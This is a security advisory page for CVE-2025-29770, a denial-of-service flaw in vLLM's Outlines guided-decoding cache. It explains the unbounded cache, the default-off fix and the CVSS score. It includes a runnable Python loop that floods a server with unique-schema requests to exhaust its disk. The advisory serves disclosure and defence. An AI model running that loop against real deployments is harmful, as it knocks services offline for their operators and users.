PyPI: vllm

CVE-2025-29770

Safety vulnerability ID: 76302

This vulnerability was reviewed by experts

The information on this page was manually curated by our Cybersecurity Intelligence Team.

Created: Mar 19, 2025 · Updated: Oct 04, 2025

Advisory

Affected versions of the vLLM package are vulnerable to denial of service through unbounded filesystem cache growth in the Outlines guided decoding backend. The outlines_logits_processors.py module does not bound the size of the grammar compilation cache, so every distinct schema it compiles adds a new entry on disk.
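
The failure mode is easiest to see next to its remedy. The sketch below is not vLLM's code; it is a minimal in-memory illustration of a compilation cache keyed by the schema itself, first with no eviction (the vulnerable pattern), then capped with an LRU bound:

```python
from functools import lru_cache

# Vulnerable pattern: one cache entry per distinct schema, never evicted,
# so attacker-controlled schemas grow the cache without limit. (The real
# Outlines cache lives on the filesystem; this illustration is in-memory.)
_grammar_cache: dict = {}

def compile_grammar_unbounded(schema: str) -> str:
    if schema not in _grammar_cache:
        _grammar_cache[schema] = f"compiled<{schema}>"  # stand-in for a grammar
    return _grammar_cache[schema]

# Bounded alternative: an LRU cache caps growth at maxsize entries.
@lru_cache(maxsize=1024)
def compile_grammar_bounded(schema: str) -> str:
    return f"compiled<{schema}>"  # stand-in for a grammar
```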

A remote attacker can exploit this by sending a stream of requests with unique schemas through the OpenAI-compatible API server; each request adds a new cache entry, eventually exhausting the filesystem and rendering the service unavailable. Additionally, the cache was enabled by default with no administrative control, so every V0 engine deployment was exposed.
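
A minimal sketch of that request pattern, assuming a vLLM OpenAI-compatible server on localhost and the guided_json guided-decoding parameter from vLLM's public API; the model name and request count are placeholders. Because every schema is unique, no request can ever hit the cache, and each one triggers a fresh compilation and cache write:

```python
import requests

# Hypothetical target: a V0-engine vLLM server with the Outlines backend.
BASE_URL = "http://localhost:8000/v1/completions"

for i in range(100_000):
    # A distinct property name makes each schema unique, guaranteeing a
    # cache miss, a fresh grammar compilation, and a new on-disk entry.
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
    }
    requests.post(
        BASE_URL,
        json={
            "model": "my-model",       # placeholder model name
            "prompt": "Reply in JSON.",
            "max_tokens": 1,
            "guided_json": schema,     # vLLM's guided-decoding extension
        },
        timeout=30,
    )
```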

The vulnerability was fixed by disabling the Outlines cache by default and introducing the VLLM_V0_USE_OUTLINES_CACHE environment variable for administrators who wish to explicitly enable it. The V1 engine is not affected by this vulnerability.
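
Operators who have vetted their workload (for example, a fixed set of schemas from trusted clients) and want the compilation speedup back can set the advisory's environment variable before the server starts. A sketch; the accepted truthy value is an assumption, as the advisory does not spell it out:

```python
import os

# Opt back in to the Outlines filesystem cache on the V0 engine. Only do
# this when schemas come from trusted clients, since the cache is again
# unbounded once enabled. The value "1" is assumed to be truthy here.
os.environ["VLLM_V0_USE_OUTLINES_CACHE"] = "1"
```

Disabling the cache by default and gating re-enablement behind an explicit opt-in is the conservative fix: it removes the unauthenticated growth vector without removing the feature for deployments that can bound their schema set.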

Affected package

vllm

Latest version: 0.11.0

A high-throughput and memory-efficient inference and serving engine for LLMs

Affected versions

Fixed versions

Severity Details

CVSS Base Score: MEDIUM 6.5

CVSS v3 Details: MEDIUM 6.5 (vector AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

Attack Vector (AV): NETWORK
Attack Complexity (AC): LOW
Privileges Required (PR): LOW
User Interaction (UI): NONE
Scope (S): UNCHANGED
Confidentiality Impact (C): NONE
Integrity Impact (I): NONE
Availability Impact (A): HIGH